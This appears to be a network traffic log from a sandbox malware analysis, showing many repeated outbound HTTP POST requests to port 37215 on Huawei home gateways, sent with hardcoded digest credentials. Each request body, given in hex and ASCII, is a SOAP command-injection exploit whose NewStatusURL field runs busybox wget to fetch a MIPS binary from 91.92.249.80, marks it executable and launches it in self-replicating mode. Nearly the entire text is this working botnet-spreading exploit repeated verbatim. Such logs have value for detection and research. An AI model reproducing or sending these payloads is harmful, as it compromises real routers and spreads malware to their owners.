                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          793192.168.2.235282841.107.23.4037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.234674931 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          794192.168.2.2352010157.71.177.7537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.234699011 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          795192.168.2.2334020197.87.206.23737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.235642910 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          796192.168.2.2347302157.69.138.11537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.235671997 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          797192.168.2.2345282157.152.148.18237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.235776901 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          798192.168.2.235192841.150.3.17837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.235793114 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          799192.168.2.2359286157.245.250.4537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.236932039 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          800192.168.2.2337326197.116.84.22237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.237034082 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          801192.168.2.2360546197.95.37.4337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.237067938 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          802192.168.2.235658841.250.234.8137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.237080097 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          803192.168.2.235155241.151.11.13637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.237080097 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
